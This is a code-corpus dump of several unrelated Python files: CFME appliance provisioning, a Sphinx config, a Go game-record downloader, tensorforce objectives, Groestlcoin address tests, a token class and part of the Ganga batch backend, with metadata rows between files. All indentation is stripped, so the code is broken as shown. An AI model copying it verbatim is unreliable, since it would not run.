Returns: Unconfigured appliance; instance of :py:class:`Appliance`
Usage:
my_appliance = provision_appliance('5.5.1.8', 'my_tests')
my_appliance.fix_ntp_clock()
...other configuration...
my_appliance.db.enable_internal()
my_appliance.wait_for_web_ui()
or
my_appliance = provision_appliance('5.5.1.8', 'my_tests')
my_appliance.configure()
"""
def _generate_vm_name():
if version is not None:
version_digits = ''.join([letter for letter in version if letter.isdigit()])
return '{}_{}_{}'.format(
vm_name_prefix, version_digits, fauxfactory.gen_alphanumeric(8))
else:
return '{}_{}'.format(vm_name_prefix, fauxfactory.gen_alphanumeric(8))
def _get_latest_template():
from cfme.utils import trackerbot
api = trackerbot.api()
stream = get_stream(version)
template_data = trackerbot.latest_template(api, stream, provider_name)
return template_data.get('latest_template')
if provider_name is None:
provider_name = conf.cfme_data.get('appliance_provisioning', {})['default_provider']
if template is not None:
template_name = template
elif version is not None:
templates_by_version = conf.cfme_data.get('appliance_provisioning', {}).get('versions', {})
try:
template_name = templates_by_version[version]
except KeyError:
# We try to get the latest template from the same stream - if trackerbot is set up
if conf.env.get('trackerbot', {}):
template_name = _get_latest_template()
if not template_name:
raise ApplianceException('No template found for stream {} on provider {}'
.format(get_stream(version), provider_name))
logger.warning('No template found matching version %s, using %s instead.',
version, template_name)
else:
raise ApplianceException('No template found matching version {}'.format(version))
else:
raise ApplianceException('Either version or template name must be specified')
prov_data = conf.cfme_data.get('management_systems', {})[provider_name]
from cfme.utils.providers import get_mgmt
provider = get_mgmt(provider_name)
if not vm_name:
vm_name = _generate_vm_name()
deploy_args = {}
deploy_args['vm_name'] = vm_name
if prov_data['type'] == 'rhevm':
deploy_args['cluster'] = prov_data['default_cluster']
if prov_data["type"] == "virtualcenter":
if "allowed_datastores" in prov_data:
deploy_args["allowed_datastores"] = prov_data["allowed_datastores"]
provider.deploy_template(template_name, **deploy_args)
return Appliance(provider_name, vm_name)
class ApplianceStack(LocalStack):
def push(self, obj):
was_before = self.top
super(ApplianceStack, self).push(obj)
logger.info("Pushed appliance {} on stack (was {} before) ".format(
obj.hostname, getattr(was_before, 'hostname', 'empty')))
if obj.browser_steal:
from cfme.utils import browser
browser.start()
def pop(self):
was_before = super(ApplianceStack, self).pop()
current = self.top
logger.info(
"Popped appliance {} from the stack (now there is {})".format(
getattr(was_before, 'address', 'empty'),
getattr(current, 'address', 'empty')))
if getattr(was_before, 'browser_steal', False):
from cfme.utils import browser
browser.start()
return was_before
stack = ApplianceStack()
def load_appliances(appliance_list, global_kwargs):
"""Instantiate a list of appliances from configuration data.
Args:
appliance_list: List of dictionaries that contain parameters for :py:class:`IPAppliance`
global_kwargs: Arguments that will be defined for each appliances. Appliance can override.
Result:
List of :py:class:`IPAppliance`
"""
result = []
for idx, appliance_kwargs in enumerate(appliance_list):
kwargs = {}
kwargs.update(global_kwargs)
kwargs.update(appliance_kwargs)
if kwargs.pop('dummy', False):
result.append(DummyAppliance(**kwargs))
else:
mapping = IPAppliance.CONFIG_MAPPING
if not any(k in mapping for k in kwargs):
raise ValueError(
"No valid IPAppliance kwargs found in config for appliance #{}".format(idx)
)
appliance = IPAppliance(**{mapping[k]: v for k, v in kwargs.items() if k in mapping})
result.append(appliance)
return result
def _version_for_version_or_stream(version_or_stream, sprout_client=None):
if version_or_stream is attr.NOTHING:
return attr.fields(DummyAppliance).version.default
if isinstance(version_or_stream, Version):
return version_or_stream
assert isinstance(version_or_stream, six.string_types), version_or_stream
from cfme.test_framework.sprout.client import SproutClient
sprout_client = SproutClient.from_config() if sprout_client is None else sprout_client
if version_or_stream[0].isdigit(): # presume streams start with non-number
return Version(version_or_stream)
for version_str in sprout_client.available_cfme_versions():
version = Version(version_str)
if version.stream() == version_or_stream:
return version
raise LookupError(version_or_stream)
def collections_for_appliance(appliance):
from cfme.modeling.base import EntityCollections
return EntityCollections.for_appliance(appliance)
@attr.s
class DummyAppliance(object):
"""a dummy with minimal attribute set"""
hostname = 'DummyApplianceHostname'
browser_steal = False
version = attr.ib(default=Version('5.8.0'), convert=_version_for_version_or_stream)
is_downstream = True
is_pod = False
is_dev = False
build = 'missing :)'
managed_known_providers = []
collections = attr.ib(default=attr.Factory(collections_for_appliance, takes_self=True))
@classmethod
def from_config(cls, pytest_config):
version = pytest_config.getoption('--dummy-appliance-version')
return cls(version=(version or attr.NOTHING))
def set_session_timeout(self, *k):
pass
def find_appliance(obj, require=True):
if isinstance(obj, NavigatableMixin):
return obj.appliance
# duck type - either is the config of pytest, or holds it
config = getattr(obj, 'config', obj)
from cfme.test_framework.appliance import PLUGIN_KEY
holder = config.pluginmanager.get_plugin(PLUGIN_KEY)
if holder or require:
assert holder
return holder.held_appliance
def load_appliances_from_config(config):
"""
Instantiate IPAppliance objects based on data in ``appliances`` section of config.
The ``config`` contains some global values and ``appliances`` key which contains a list of dicts
that have the same keys as ``IPAppliance.CONFIG_MAPPING``'s keys.
The global values in the root of the dict have lesser priority than the values in appliance
definitions themselves
Args:
config: A dictionary with the configuration
"""
if 'appliances' not in config:
raise ValueError("Invalid config: missing an 'appliances' section")
appliances = config['appliances']
global_kwargs = {
k: config[k]
for k in IPAppliance.CONFIG_MAPPING.keys()
if k not in IPAppliance.CONFIG_NONGLOBAL and k in config}
return load_appliances(appliances, global_kwargs)
class ApplianceSummoningWarning(Warning):
"""to ease filtering/erroring on magical appliance creation based on script vs code"""
def get_or_create_current_appliance():
if stack.top is None:
warnings.warn(
"magical creation of appliance objects has been deprecated,"
" please obtain a appliance object directly",
category=ApplianceSummoningWarning,
)
stack.push(load_appliances_from_config(conf.env)[0])
return stack.top
current_appliance = LocalProxy(get_or_create_current_appliance)
class _CurrentAppliance(object):
def __get__(self, instance, owner):
return get_or_create_current_appliance()
class NavigatableMixin(object):
"""NavigatableMixin ensures that an object can navigate properly
The NavigatableMixin object ensures that a Collection/Entity object inside the
framework has access to be able to **create** a Widgetastic View, and that it
has access to the browser.
Note: The browser access will have to change once proliferation of the Sentaku
system becomes common place
"""
@property
def browser(self):
return self.appliance.browser.widgetastic
def create_view(self, view_class, o=None, override=None):
o = o or self
if override is not None:
new_obj = copy(o)
new_obj.__dict__.update(override)
else:
new_obj = o
return self.appliance.browser.create_view(
view_class, additional_context={'object': new_obj})
class NavigatableDeprecationWarning(DeprecationWarning):
pass
warnings.simplefilter('ignore', NavigatableDeprecationWarning)
@removals.removed_class(
"Navigatable", message=("Navigatable is being deprecated in favour of using Collections "
"objects with the NavigatableMixin"),
category=NavigatableDeprecationWarning,
)
class Navigatable(NavigatableMixin):
appliance = _CurrentAppliance()
def __init__(self, appliance=None):
self.appliance = appliance or get_or_create_current_appliance()
class MiqImplementationContext(sentaku.ImplementationContext):
""" Our context for Sentaku"""
pass
| gpl-2.0 | -1,851,766,126,545,638,000 | 40.79212 | 100 | 0.596159 | false |
dvalters/HAIL-CAESAR | docs/source/conf.py | 1 | 10385 | # -*- coding: utf-8 -*-
#
# HAIL-CAESAR documentation build configuration file, created by
# sphinx-quickstart on Sun Jul 16 10:54:36 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
'sphinxcontrib.fulltoc'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'HAIL-CAESAR'
copyright = u'2017, Declan Valters'
author = u'Declan Valters'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
html_theme_options = {
'logo': 'images/flood_depth_fig_crop.png',
'github_user': 'dvalters',
'github_repo': 'HAIL-CAESAR',
'github_button': 'true',
'github_banner': 'true'
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'HAIL-CAESAR v1.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'HAIL-CAESARdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'HAIL-CAESAR.tex', u'HAIL-CAESAR Documentation',
u'Declan Valters', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'hail-caesar', u'HAIL-CAESAR Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'HAIL-CAESAR', u'HAIL-CAESAR Documentation',
author, 'HAIL-CAESAR', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| gpl-3.0 | 6,752,765,516,872,856,000 | 27.767313 | 80 | 0.689937 | false |
maxpumperla/betago | betago/dataloader/index_processor.py | 1 | 4131 | # This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import print_function
from __future__ import absolute_import
import os
import sys
import multiprocessing
import six
if sys.version_info[0] == 3:
from urllib.request import urlopen, urlretrieve
else:
from urllib import urlopen, urlretrieve
def worker(url_and_target):
'''
Parallelize data download via multiprocessing
'''
try:
(url, target_path) = url_and_target
print('>>> Downloading ' + target_path)
urlretrieve(url, target_path)
except (KeyboardInterrupt, SystemExit):
print('>>> Exiting child process')
class KGSIndex(object):
def __init__(self,
kgs_url='http://u-go.net/gamerecords/',
index_page='kgs_index.html',
data_directory='data'):
'''
Create an index of zip files containing SGF data of actual Go Games on KGS.
Parameters:
-----------
kgs_url: URL with links to zip files of games
index_page: Name of local html file of kgs_url
data_directory: name of directory relative to current path to store SGF data
'''
self.kgs_url = kgs_url
self.index_page = index_page
self.data_directory = data_directory
self.file_info = []
self.urls = []
self.load_index() # Load index on creation
def download_files(self):
'''
Download zip files by distributing work on all available CPUs
'''
if not os.path.isdir(self.data_directory):
os.makedirs(self.data_directory)
urls_to_download = []
for file_info in self.file_info:
url = file_info['url']
file_name = file_info['filename']
if not os.path.isfile(self.data_directory + '/' + file_name):
urls_to_download.append((url, self.data_directory + '/' + file_name))
cores = multiprocessing.cpu_count()
pool = multiprocessing.Pool(processes=cores)
try:
it = pool.imap(worker, urls_to_download)
for i in it:
pass
pool.close()
pool.join()
except KeyboardInterrupt:
print(">>> Caught KeyboardInterrupt, terminating workers")
pool.terminate()
pool.join()
sys.exit(-1)
def create_index_page(self):
'''
If there is no local html containing links to files, create one.
'''
if os.path.isfile(self.index_page):
print('>>> Reading cached index page')
index_file = open(self.index_page, 'r')
index_contents = index_file.read()
index_file.close()
else:
print('>>> Downloading index page')
fp = urlopen(self.kgs_url)
data = six.text_type(fp.read())
fp.close()
index_contents = data
index_file = open(self.index_page, 'w')
index_file.write(index_contents)
index_file.close()
return index_contents
def load_index(self):
'''
Create the actual index representation from the previously downloaded or cached html.
'''
index_contents = self.create_index_page()
split_page = [item for item in index_contents.split('<a href="') if item.startswith("https://")]
for item in split_page:
download_url = item.split('">Download')[0]
if download_url.endswith('.tar.gz'):
self.urls.append(download_url)
for url in self.urls:
filename = os.path.basename(url)
split_file_name = filename.split('-')
num_games = int(split_file_name[len(split_file_name) - 2])
print(filename + ' ' + str(num_games))
self.file_info.append({'url': url, 'filename': filename, 'num_games': num_games})
if __name__ == '__main__':
index = KGSIndex()
index.download_files()
| mit | -410,448,613,732,599,400 | 34.307692 | 104 | 0.575163 | false |
reinforceio/tensorforce | tensorforce/core/objectives/__init__.py | 1 | 1414 | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from functools import partial
from tensorforce.core.objectives.objective import Objective
from tensorforce.core.objectives.deterministic_policy_gradient import DeterministicPolicyGradient
from tensorforce.core.objectives.plus import Plus
from tensorforce.core.objectives.policy_gradient import PolicyGradient
from tensorforce.core.objectives.value import Value
objective_modules = dict(
action_value=partial(Value, value='action'),
deterministic_policy_gradient=DeterministicPolicyGradient, plus=Plus,
policy_gradient=PolicyGradient, state_value=partial(Value, value='state'), value=Value
)
__all__ = [
'DeterministicPolicyGradient', 'Objective', 'objective_modules', 'Plus', 'PolicyGradient',
'Value'
]
| apache-2.0 | 7,275,374,175,043,447,000 | 38.277778 | 97 | 0.738331 | false |
Groestlcoin/electrumx-grs | tests/lib/test_addresses.py | 1 | 2130 | # Copyright (c) 2017, the ElectrumX authors
#
# All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# and warranty status of this software.
import pytest
from lib.coins import Groestlcoin
from lib.hash import Base58
addresses = [
(Groestlcoin, "FY7vmDL7FZGACwqVNx5p4fVaGghojWM5AF",
"206168f5322583ff37f8e55665a4789ae8963532", "b8cb80b26e8932f5b12a7e"),
]
@pytest.fixture(params=addresses)
def address(request):
return request.param
def test_address_to_hashX(address):
coin, addr, _, hashX = address
assert coin.address_to_hashX(addr).hex() == hashX
def test_address_from_hash160(address):
coin, addr, hash, _ = address
raw = coin.DECODE_CHECK(addr)
verlen = len(raw) - 20
assert verlen > 0
verbyte, hash_bytes = raw[:verlen], raw[verlen:]
if coin.P2PKH_VERBYTE == verbyte:
assert coin.P2PKH_address_from_hash160(bytes.fromhex(hash)) == addr
elif verbyte in coin.P2SH_VERBYTES:
assert coin.P2SH_address_from_hash160(bytes.fromhex(hash)) == addr
else:
raise Exception("Unknown version byte")
| mit | -5,922,166,777,629,881,000 | 34.5 | 75 | 0.741315 | false |
fnl/libfnl | src/fnl/text/token_new.py | 1 | 6670 | """
.. py:module:: fnl.text.token
:synopsis: A tuple structure to hold token metadata.
.. moduleauthor:: Florian Leitner <[email protected]>
.. License: GNU Affero GPL v3 (http://www.gnu.org/licenses/agpl.html)
"""
from operator import itemgetter, methodcaller
from fn import _
from fn.monad import optionable
class token(tuple):
"""
A data structure for tokens.
Provides some additional introspection methods about the token's tags (``...Is...``).
Tokens have the following attributes:
1. ``text`` - the text object containing this token
1. ``namespace`` - the namespace for this token (e.g., the URI of the tokenizer used)
1. ``offset`` - the offset of the token in its containing string (e.g., ``(10, 15)``)
1. ``norm`` - a normalized form of the token (i.e., its stem or lemma)
1. ``ortho`` - a regular representation of the token's orthographic features
1. ``pos`` - the PoS tag (e.g., 'NNS')
1. ``chunk`` - the chunk tag in BIO-notation (e.g., 'B-NP')
1. ``entity`` - the entity tag in BIO-notation (e.g., 'I-gene')
1. ``word`` - the actual token string
1. ``begin`` - the begin postion (inclusive) of this token in the text
1. ``end`` - the end postion (exclusive) of this token in the text
The first three attributes (text, ns, and offset) are required, the last three properties
(word, begin, end) are inferred. All other attributes are optional **tags** on this token and
are returned as `Option` values.
"""
__slots__ = ()
_optional = ('norm', 'ortho', 'pos', 'chunk', 'entity')
def __new__(cls, txt, *ns_off, **tags):
"""
Create a new token.
A new token can either be created from a single object that can be evaluate to a tuple
of length of the number of required attributes and optional tags or by providing the
required attributes plus any optional tags (as keywords or in order).
"""
if len(ns_off) == 0 and not isinstance(txt, str):
txt, namespace, offset, tags = cls.__copy(txt)
else:
txt, namespace, offset, tags = cls.__make(txt, ns_off, tags)
assert isinstance(txt, str)
assert isinstance(namespace, str)
tags = tuple(tags.get(key) for key in cls._optional)
return tuple.__new__(cls, (txt, namespace, offset) + tags)
@staticmethod
def __make(txt, ns_off, tags):
"""Default constructor helper."""
try:
namespace = ns_off[0]
begin, end = ns_off[1]
offset = (int(begin), int(end))
except IndexError:
raise ValueError('namespace and/or offset undefined')
for idx, key in enumerate(token._optional):
if len(ns_off) > idx + 2:
tags[key] = ns_off[idx + 2]
else:
break
return txt, namespace, offset, tags
@staticmethod
def __copy(txt):
"""Copy constructor helper."""
tags = {}
txt = tuple(txt)
if len(txt) < 3 + len(token._optional):
raise ValueError('incorrect number of values: %i' % len(txt))
for idx, key in enumerate(token._optional):
if txt[idx + 3] is not None:
tags[key] = txt[idx + 3]
begin, end = tuple(txt[2])
off = (int(begin), int(end))
ns = txt[1]
txt = txt[0]
return txt, ns, off, tags
text = property(itemgetter(0), doc="the text object containing this token")
namespace = property(itemgetter(1), doc="the namespace of this token")
offset = property(itemgetter(2), doc="the (begin, end) offset in the text")
norm = property(optionable(itemgetter(3)), doc="the normalized token tag")
ortho = property(optionable(itemgetter(4)), doc="the orthographic descriptor tag")
pos = property(optionable(itemgetter(5)), doc="the part-of-speech tag")
chunk = property(optionable(itemgetter(6)), doc="the BIO phrase tag")
entity = property(optionable(itemgetter(7)), doc="the BIO NER tag")
ns = namespace
"""An alias for `namespace`."""
@property
def begin(self) -> int:
"""Return the begin index (inclusive) of the token."""
return self.offset[0]
@property
def end(self) -> int:
"""Return the end index (exclusive) of the token."""
return self.offset[1]
@property
def word(self) -> str:
"""Return the underlying token itself."""
return self.text[self.begin:self.end]
def __repr__(self) -> str:
return 'token(%s, %r%s)' % (
self.namespace, self.word,
''.join([
getattr(self, key).map(lambda val: ', %s=%r' % (key, val)).get_or('')
for key in self._optional
])
)
def __str__(self) -> str:
s = ['\\N' if i is None else str(i).replace('\t', '\\t') for i in self[1:]]
s[1] = '%i:%i' % self.offset
return '\t'.join(s)
def Update(self, **kwds):
"""Return a new `token` by replacing the specified fields."""
txt = kwds.get('text', self.text)
namespace = kwds.get('namespace', self.namespace)
offset = kwds.get('offset', self.offset)
for key in self._optional:
kwds[key] = kwds.get(key, getattr(self, key).get_or(None))
return token(txt, namespace, offset, **kwds)
@staticmethod
def _IsBegin(tag) -> bool:
return tag.map(methodcaller('startswith', 'B-')).get_or(False)
@staticmethod
def _IsInside(tag) -> bool:
return tag.map(methodcaller('startswith', 'I-')).get_or(False)
@staticmethod
def _IsOutside(tag) -> bool:
return tag.map(_ == 'O').get_or(False)
def PosIs(self, value) -> bool:
return self.pos.map(_ == value).get_or(value is None)
def PosStartswith(self, value) -> bool:
return self.pos.map(methodcaller('startswith', value)).get_or(False)
def ChunkIsOutside(self) -> bool:
return token._IsOutside(self.chunk)
def ChunkIsBegin(self) -> bool:
return token._IsBegin(self.chunk)
def ChunkIsInside(self) -> bool:
return token._IsInside(self.chunk)
def ChunkIs(self, value) -> bool:
return self.chunk.map(lambda c: c[2:] == value).get_or(False)
def EntityIsOutside(self) -> bool:
return token._IsOutside(self.entity)
def EntityIsBegin(self) -> bool:
return token._IsBegin(self.entity)
def EntityIsInside(self) -> bool:
return token._IsInside(self.entity)
def EntityIs(self, value) -> bool:
return self.entity.map(lambda e: e[2:] == value).get_or(False)
| agpl-3.0 | -8,545,638,999,496,082,000 | 33.921466 | 97 | 0.594753 | false |
ganga-devs/ganga | ganga/GangaCore/Lib/Batch/Batch.py | 1 | 24988 | import datetime
import time
import os
import re
import os.path
import GangaCore.Utility.logging
import GangaCore.Utility.Config
import GangaCore.Utility.Virtualization
from GangaCore.GPIDev.Adapters.IBackend import IBackend
from GangaCore.GPIDev.Base.Proxy import isType, getName, stripProxy
from GangaCore.GPIDev.Schema import Schema, Version, SimpleItem
from GangaCore.Core.exceptions import BackendError
logger = GangaCore.Utility.logging.getLogger()
# A trival implementation of shell command with stderr/stdout capture
# This is a self-contained function (with logging).
#
# return (exitcode,soutfile,exeflag)
# soutfile - path where the stdout/stderr is stored
# exeflag - 0 if the command failed to execute, 1 if it executed
def shell_cmd(cmd, soutfile=None, allowed_exit=[0]):
if not soutfile:
import tempfile
soutfile = tempfile.mktemp()
# FIXME: garbbing stdout is done by shell magic and probably should be
# implemented in python directly
cmd = "%s > %s 2>&1" % (cmd, soutfile)
logger.debug("running shell command: %s", cmd)
rc = os.system(cmd)
if not rc in allowed_exit:
logger.debug('exit status [%d] of command %s', rc, cmd)
logger.debug('full output is in file: %s', soutfile)
with open(soutfile) as sout_file:
logger.debug('<first 255 bytes of output>\n%s', sout_file.read(255))
logger.debug('<end of first 255 bytes of output>')
m = None
if rc != 0:
logger.debug('non-zero [%d] exit status of command %s ', rc, cmd)
with open(soutfile) as sout_file:
m = re.compile(r"command not found$", re.M).search(sout_file.read())
return rc, soutfile, m is None
class Batch(IBackend):
""" Batch submission backend.
It is assumed that Batch commands (bjobs, bsub etc.) setup
correctly. As little assumptions as possible are made about the
Batch configuration but at certain sites it may not work correctly
due to a different Batch setup. Tested with CERN and CNAF Batch
installations.
Each batch system supports an 'extraopts' field, which allows customisation
of way the job is submitted.
PBS:
Take environment settings on submitting machine and export to batch job:
backend.extraopts = "-V"
Request minimum walltime of 24 hours and minimum memory of 2GByte:
backend.extraopts = "-l walltime=24:00:00 mem=2gb"
The above can be combined as:
backend.extraopts = "-V -l walltime=24:00:00 mem=2gb"
LSF:
Sends mail to you when the job is dispatched and begins execution.
backend.extraopts = "-B"
Assigns the Ganga job name to the batch job. The job name does not need to
be unique.
backend.extraopts = "-J "+ j.name
Run the job on a host that meets the specified resource requirements.
A resource requirement string describes the resources a job needs.
E.g request 2Gb of memory ans 1Gb of swap space
backend.extraopts = '-R "mem=2048" -R "swp=1024"'
Kill job if it has exceeded the deadline (i.e. for your presentation)
backend.extraopts = '-t 07:14:12:59' #Killed if not finished by 14 July before 1 pm
"""
_schema = Schema(Version(1, 0), {'queue': SimpleItem(defvalue='', doc='queue name as defomed in your local Batch installation'),
'extraopts': SimpleItem(defvalue='', changable_at_resubmit=1, doc='extra options for Batch. See help(Batch) for more details'),
'id': SimpleItem(defvalue='', protected=1, copyable=0, doc='Batch id of the job'),
'exitcode': SimpleItem(defvalue=None, typelist=[int, None], protected=1, copyable=0, doc='Process exit code'),
'status': SimpleItem(defvalue='', protected=1, hidden=1, copyable=0, doc='Batch status of the job'),
'actualqueue': SimpleItem(defvalue='', protected=1, copyable=0, doc='queue name where the job was submitted.'),
'actualCE': SimpleItem(defvalue='', protected=1, copyable=0, doc='hostname where the job is/was running.')
})
_category = 'backends'
_name = 'Batch'
_hidden = 1
def __init__(self):
super(Batch, self).__init__()
def command(klass, cmd, soutfile=None, allowed_exit=None):
if allowed_exit is None:
allowed_exit = [0]
rc, soutfile, ef = shell_cmd(cmd, soutfile, allowed_exit)
if not ef:
logger.error(
'Problem submitting batch job. Maybe your chosen batch system is not available or you have configured it wrongly')
with open(soutfile) as sout_file:
logger.error(sout_file.read())
raiseable = BackendError(klass._name, 'It seems that %s commands are not installed properly:%s' % (klass._name, sout_file.readline()))
return rc, soutfile
command = classmethod(command)
def _getLegalJobName(self, job):
tmp_name = job.name
# if jobnamesubstitution is set and not empty, then transform the job
# name to conform to requirements
if 'jobnamesubstitution' in self.config:
job_name_sub_cfg = self.config['jobnamesubstitution']
